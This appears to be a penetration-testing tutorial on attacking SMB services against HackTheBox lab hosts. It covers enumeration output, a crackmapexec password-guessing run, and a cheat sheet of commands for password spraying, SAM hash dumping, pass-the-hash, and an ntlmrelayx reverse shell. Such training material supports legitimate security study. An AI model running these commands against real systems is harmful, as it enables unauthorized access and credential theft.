ATTACKING COMMONLY USED SERVICES: PART_03 Exploiting SMB

by
Sharing is caring

Views: 32

Server Message Block (SMB) is a communication protocol created for providing shared access to files and printers across nodes on a network. Initially, it was designed to run on top of NetBIOS over TCP/IP (NBT) using TCP port 139 and UDP ports 137 and 138. However, with Windows 2000, Microsoft added the option to run SMB directly over TCP/IP on port 445 without the extra NetBIOS layer. Nowadays, modern Windows operating systems use SMB over TCP but still support the NetBIOS implementation as a failover.

For instance, on Windows, SMB can run directly over port 445 TCP/IP without the need for NetBIOS over TCP/IP, but if Windows has NetBIOS enabled, or we are targetting a non-Windows host, we will find SMB running on port 139 TCP/IP. This means that SMB is running with NetBIOS over TCP/IP.

Samba is a Unix/Linux-based open-source implementation of the SMB protocol. It also allows Linux/Unix servers and Windows clients to use the same SMB services.

Another protocol that is commonly related to SMB is MSRPC (Microsoft Remote Procedure Call). RPC provides an application developer a generic way to execute a procedure (a.k.a. a function) in a local or remote process without having to understand the network protocols used to support the communication, as specified in MS-RPCE, which defines an RPC over SMB Protocol that can use SMB Protocol named pipes as its underlying transport.

Enumeration

# nmap 
sudo nmap 10.129.97.19 -sV -sC -p139,445
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-28 10:58 BST
Nmap scan report for 10.129.97.19
Host is up (0.0024s latency).

PORT    STATE SERVICE     VERSION
139/tcp open  netbios-ssn Samba smbd 4.6.2
445/tcp open  netbios-ssn Samba smbd 4.6.2

Host script results:
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2023-04-28T09:59:11
|_  start_date: N/A
|_nbstat: NetBIOS name: ATTCSVC-LINUX, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.89 seconds
Expand

Enum4linux

./enum4linux-ng.py 10.129.2.51 -A -C
ENUM4LINUX - next generation (v1.3.1)

 ==========================
|    Target Information    |
 ==========================
[*] Target ........... 10.129.2.51
[*] Username ......... ''
[*] Random Username .. 'wyokhvov'
[*] Password ......... ''
[*] Timeout .......... 5 second(s)

 ====================================
|    Listener Scan on 10.129.2.51    |
 ====================================
[*] Checking LDAP
[-] Could not connect to LDAP on 389/tcp: connection refused
[*] Checking LDAPS
[-] Could not connect to LDAPS on 636/tcp: connection refused
[*] Checking SMB
[+] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS
[+] SMB over NetBIOS is accessible on 139/tcp

 ==========================================================
|    NetBIOS Names and Workgroup/Domain for 10.129.2.51    |
 ==========================================================
[+] Got domain/workgroup name: WORKGROUP
[+] Full NetBIOS names information:
- ATTCSVC-LINUX   <00> -         B <ACTIVE>  Workstation Service
- ATTCSVC-LINUX   <03> -         B <ACTIVE>  Messenger Service
- ATTCSVC-LINUX   <20> -         B <ACTIVE>  File Server Service
- WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
- WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections
- MAC Address = 00-00-00-00-00-00

 ========================================
|    SMB Dialect Check on 10.129.2.51    |
 ========================================
[*] Trying on 445/tcp
[+] Supported dialects and settings:
Supported dialects:
  SMB 1.0: false
  SMB 2.02: true
  SMB 2.1: true
  SMB 3.0: true
  SMB 3.1.1: true
Preferred dialect: SMB 3.0
SMB1 only: false
SMB signing required: false

 ==========================================================
|    Domain Information via SMB session for 10.129.2.51    |
 ==========================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: ATTCSVC-LINUX
NetBIOS domain name: ''
DNS domain: ''
FQDN: attcsvc-linux
Derived membership: workgroup member
Derived domain: unknown

 ========================================
|    RPC Session Check on 10.129.2.51    |
 ========================================
[*] Check for null session
[+] Server allows session using username '', password ''
[*] Check for random user
[+] Server allows session using username 'wyokhvov', password ''
[H] Rerunning enumeration with user 'wyokhvov' might give more results

 ==================================================
|    Domain Information via RPC for 10.129.2.51    |
 ==================================================
[+] Domain: WORKGROUP
[+] Domain SID: NULL SID
[+] Membership: workgroup member

 ==============================================
|    OS Information via RPC for 10.129.2.51    |
 ==============================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found OS information via SMB
[*] Enumerating via 'srvinfo'
[+] Found OS information via 'srvinfo'
[+] After merging OS information we have the following result:
OS: Linux/Unix
OS version: '6.1'
OS release: ''
OS build: '0'
Native OS: not supported
Native LAN manager: not supported
Platform id: '500'
Server type: '0x809a03'
Server type string: Wk Sv PrQ Unx NT SNT attcsvc-linux Samba

 ====================================
|    Users via RPC on 10.129.2.51    |
 ====================================
[*] Enumerating users via 'querydispinfo'
[+] Found 2 user(s) via 'querydispinfo'
[*] Enumerating users via 'enumdomusers'
[+] Found 2 user(s) via 'enumdomusers'
[+] After merging user results we have 2 user(s) total:
'1000':
  username: jason
  name: ''
  acb: '0x00000010'
  description: ''
'1001':
  username: robin
  name: ''
  acb: '0x00000010'
  description: ''

 =====================================
|    Groups via RPC on 10.129.2.51    |
 =====================================
[*] Enumerating local groups
[+] Found 0 group(s) via 'enumalsgroups domain'
[*] Enumerating builtin groups
[+] Found 0 group(s) via 'enumalsgroups builtin'
[*] Enumerating domain groups
[+] Found 0 group(s) via 'enumdomgroups'

 =======================================
|    Services via RPC on 10.129.2.51    |
 =======================================
[+] Found 4 service(s):
NETLOGON:
  description: Net Logon
RemoteRegistry:
  description: Remote Registry Service
Spooler:
  description: Print Spooler
WINS:
  description: Windows Internet Name Service (WINS)

 =====================================
|    Shares via RPC on 10.129.2.51    |
 =====================================
[*] Enumerating shares
[+] Found 3 share(s):
GGJ:
  comment: Priv
  type: Disk
IPC$:
  comment: IPC Service (attcsvc-linux Samba)
  type: IPC
print$:
  comment: Printer Drivers
  type: Disk
[*] Testing share GGJ
[+] Mapping: OK, Listing: OK
[*] Testing share IPC$
[-] Could not check share: STATUS_OBJECT_NAME_NOT_FOUND
[*] Testing share print$
[+] Mapping: DENIED, Listing: N/A

 ========================================
|    Policies via RPC for 10.129.2.51    |
 ========================================
[*] Trying port 445/tcp
[+] Found policy:
Domain password information:
  Password history length: None
  Minimum password length: 5
  Maximum password age: 49710 days 6 hours 21 minutes
  Password properties:
  - DOMAIN_PASSWORD_COMPLEX: false
  - DOMAIN_PASSWORD_NO_ANON_CHANGE: false
  - DOMAIN_PASSWORD_NO_CLEAR_CHANGE: false
  - DOMAIN_PASSWORD_LOCKOUT_ADMINS: false
  - DOMAIN_PASSWORD_PASSWORD_STORE_CLEARTEXT: false
  - DOMAIN_PASSWORD_REFUSE_PASSWORD_CHANGE: false
Domain lockout information:
  Lockout observation window: 30 minutes
  Lockout duration: 30 minutes
  Lockout threshold: None
Domain logoff information:
  Force logoff time: 49710 days 6 hours 21 minutes

 ========================================
|    Printers via RPC for 10.129.2.51    |
 ========================================
[+] No printers returned (this is not an error)

Completed after 1.20 seconds
Expand

CrackMapSec (CME)

$crackmapexec smb 10.129.2.51 -u jason -p pass.txt --local-auth
SMB         10.129.2.51     445    ATTCSVC-LINUX    [*] Windows 6.1 Build 0 (name:ATTCSVC-LINUX) (domain:ATTCSVC-LINUX) (signing:False) (SMBv1:False)
SMB         10.129.2.51     445    ATTCSVC-LINUX    [-] ATTCSVC-LINUX\jason:liverpool STATUS_LOGON_FAILURE 
SMB         10.129.2.51     445    ATTCSVC-LINUX    [-] ATTCSVC-LINUX\jason:theman STATUS_LOGON_FAILURE 
SMB         10.129.2.51     445    ATTCSVC-LINUX    [-] ATTCSVC-LINUX\jason:bandit STATUS_LOGON_FAILURE 
SMB         10.129.2.51     445    ATTCSVC-LINUX    [-] ATTCSVC-LINUX\jason:dolphins STATUS_LOGON_FAILURE 
SMB         10.129.2.51     445    ATTCSVC-LINUX    [-] ATTCSVC-LINUX\jason:maddog STATUS_LOGON_FAILURE 
SMB         10.129.2.51     445    ATTCSVC-LINUX    [-] ATTCSVC-LINUX\jason:packers STATUS_LOGON_FAILURE 
SMB         10.129.2.51     445    ATTCSVC-LINUX    [-] ATTCSVC-LINUX\jason:jaguar STATUS_LOGON_FAILURE 
SMB         10.129.2.51     445    ATTCSVC-LINUX    [-] ATTCSVC-LINUX\jason:lovers STATUS_LOGON_FAILURE 
SMB         10.129.2.51     445    ATTCSVC-LINUX    [-] ATTCSVC-LINUX\jason:nicholas STATUS_LOGON_FAILURE 
SMB         10.129.2.51     445    ATTCSVC-LINUX    [-] ATTCSVC-LINUX\jason:united STATUS_LOGON_FAILURE 
SMB         10.129.2.51     445    ATTCSVC-LINUX    [-] ATTCSVC-LINUX\jason:tiffany STATUS_LOGON_FAILURE 
SMB         10.129.2.51     445    ATTCSVC-LINUX    [-] ATTCSVC-LINUX\jason:maxwell STATUS_LOGON_FAILURE 
SMB         10.129.2.51     445    ATTCSVC-LINUX    [-] ATTCSVC-LINUX\jason:zzzzzz STATUS_LOGON_FAILURE 
SMB         10.129.2.51     445    ATTCSVC-LINUX    [-] ATTCSVC-LINUX\jason:nirvana STATUS_LOGON_FAILURE 
SMB         10.129.2.51     445    ATTCSVC-LINUX    [-] ATTCSVC-LINUX\jason:jeremy STATUS_LOGON_FAILURE 
SMB         10.129.2.51     445    ATTCSVC-LINUX    [-] ATTCSVC-LINUX\jason:suckit STATUS_LOGON_FAILURE 
SMB         10.129.2.51     445    ATTCSVC-LINUX    [-] ATTCSVC-LINUX\jason:stupid STATUS_LOGON_FAILURE 
SMB         10.129.2.51     445    ATTCSVC-LINUX    [-] ATTCSVC-LINUX\jason:porn STATUS_LOGON_FAILURE 
SMB         10.129.2.51     445    ATTCSVC-LINUX    [-] ATTCSVC-LINUX\jason:monica STATUS_LOGON_FAILURE 
SMB         10.129.2.51     445    ATTCSVC-LINUX    [-] ATTCSVC-LINUX\jason:elephant STATUS_LOGON_FAILURE 
SMB         10.129.2.51     445    ATTCSVC-LINUX    [-] ATTCSVC-LINUX\jason:giants STATUS_LOGON_FAILURE 
SMB         10.129.2.51     445    ATTCSVC-LINUX    [-] ATTCSVC-LINUX\jason:jackass STATUS_LOGON_FAILURE 
SMB         10.129.2.51     445    ATTCSVC-LINUX    [-] ATTCSVC-LINUX\jason:hotdog STATUS_LOGON_FAILURE 
SMB         10.129.2.51     445    ATTCSVC-LINUX    [-] ATTCSVC-LINUX\jason:rosebud STATUS_LOGON_FAILURE 
SMB         10.129.2.51     445    ATTCSVC-LINUX    [-] ATTCSVC-LINUX\jason:success STATUS_LOGON_FAILURE 
SMB         10.129.2.51     445    ATTCSVC-LINUX    [-] ATTCSVC-LINUX\jason:debbie STATUS_LOGON_FAILURE 
SMB         10.129.2.51     445    ATTCSVC-LINUX    [-] ATTCSVC-LINUX\jason:mountain STATUS_LOGON_FAILURE 
SMB         10.129.2.51     445    ATTCSVC-LINUX    [-] ATTCSVC-LINUX\jason:444444 STATUS_LOGON_FAILURE 
SMB         10.129.2.51     445    ATTCSVC-LINUX    [-] ATTCSVC-LINUX\jason:xxxxxxxx0 STATUS_LOGON_FAILURE 
SMB         10.129.2.51     445    ATTCSVC-LINUX    [-] ATTCSVC-LINUX\jason:warrior STATUS_LOGON_FAILURE 
SMB         10.129.2.51     445    ATTCSVC-LINUX    [-] ATTCSVC-LINUX\jason:1q2w3e4r5t STATUS_LOGON_FAILURE 
SMB         10.129.2.51     445    ATTCSVC-LINUX    [+] ATTCSVC-LINUX\jason:xxxxxxxxxxxxxxxxxxxx
Expand

HACKTHEBOX ACADEMY module ‘Attacking SMB’

CommandDescription
smbclient -N -L //10.129.14.128Null-session testing against the SMB service.
smbmap -H 10.129.14.128Network share enumeration using smbmap.
smbmap -H 10.129.14.128 -r notesRecursive network share enumeration using smbmap.
smbmap -H 10.129.14.128 --download "notes\note.txt"Download a specific file from the shared folder.
smbmap -H 10.129.14.128 --upload test.txt "notes\test.txt"Upload a specific file to the shared folder.
rpcclient -U'%' 10.10.110.17Null-session with the rpcclient.
./enum4linux-ng.py 10.10.11.45 -A -CAutomated enumeratition of the SMB service using enum4linux-ng.
crackmapexec smb 10.10.110.17 -u /tmp/userlist.txt -p 'Company01!'Password spraying against different users from a list.
impacket-psexec administrator:'Password123!'@10.10.110.17Connect to the SMB service using the impacket-psexec.
crackmapexec smb 10.10.110.17 -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexecExecute a command over the SMB service using crackmapexec.
crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-usersEnumerating Logged-on users.
crackmapexec smb 10.10.110.17 -u administrator -p 'Password123!' --samExtract hashes from the SAM database.
crackmapexec smb 10.10.110.17 -u Administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FEUse the Pass-The-Hash technique to authenticate on the target host.
impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.110.146Dump the SAM database using impacket-ntlmrelayx.
impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.220.146 -c 'powershell -e <base64 reverse shell>Execute a PowerShell based reverse shell using impacket-ntlmrelayx.